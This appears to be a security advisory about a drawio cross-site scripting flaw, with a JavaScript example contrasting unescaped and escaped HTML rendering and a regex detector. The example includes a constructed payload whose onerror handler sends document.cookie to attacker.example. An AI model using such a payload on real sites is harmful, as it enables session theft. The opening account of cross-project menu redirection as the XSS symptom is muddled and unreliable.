If you are running an older version of drawio, upgrade to at least version 20.3.1 before proceeding. If you do not have drawio installed, releases are available from the project's GitHub page. In an affected version, opening the project in drawio shows the menu items marked as "Not Allowed", and those menu items redirect to the menu items of other projects; opening one of the other projects shows its menu items redirected to the ones in your project in turn. That cross-project behaviour is the symptom of the cross-site scripting (XSS) issue. XSS is a vulnerability because it lets attacker-supplied script run in the user's browser with the origin and privileges of the vulnerable site, so the attacker can read data the browser holds for that site (for example session cookies or page content), send it to a server they control, and perform actions with the user's session.
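To make the mechanism concrete, the following is an added example that is not drawio's code and does not reproduce the drawio issue itself. It contrasts a renderer that concatenates an untrusted string straight into HTML with one that escapes it first, and includes a small check for the kind of active content an injection leaves behind. The payload, the attacker URL and the function names are constructed for illustration.

```javascript
// Added example: XSS-prone rendering beside its hardened form.
// Nothing here is from the drawio project; names and inputs are assumptions.

// Escape the five characters that can change HTML structure or attribute boundaries.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable: the untrusted label is concatenated directly into markup,
// so any tag or attribute in it becomes part of the page and runs in the site's origin.
function renderLabelUnsafe(label) {
  return `<div class="label">${label}</div>`;
}

// Hardened: the label is escaped, so the browser shows the attacker's text
// as text instead of parsing it as markup.
function renderLabelSafe(label) {
  return `<div class="label">${escapeHtml(label)}</div>`;
}

// Rough detector for active content: a tag carrying an event-handler attribute,
// or a script tag. Useful as a unit-test oracle, not as a sanitizer.
function hasActiveContent(html) {
  return /<\s*script\b/i.test(html) || /<[a-z][^>]*\bon[a-z]+\s*=/i.test(html);
}

// Constructed attacker-controlled input, e.g. a label read from a shared file.
// The onerror handler would ship the victim's cookies to an attacker-controlled host (hypothetical URL).
const PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

function demo() {
  const unsafe = renderLabelUnsafe(PAYLOAD);
  const safe = renderLabelSafe(PAYLOAD);
  return {
    unsafeIsActive: hasActiveContent(unsafe), // true: the injected tag survives
    safeIsActive: hasActiveContent(safe),     // false: only escaped text remains
    safe,
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

Output escaping is the fix for this class of bug whenever untrusted text is placed into HTML; the same input placed into a URL, a JavaScript string or a CSS value needs the escaping rules for that context instead, which is why one shared "sanitize" function is rarely enough.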

Issue - SRH-214

The company was recently notified of an XSS vulnerability in its website, reported as originating with a vendor. The company's IT department remediated the issue immediately and is informing customers; the affected site has also been removed from the official search engine results.

Timeline

Published on: 09/16/2022 11:15:00 UTC
Last modified on: 09/20/2022 18:18:00 UTC

References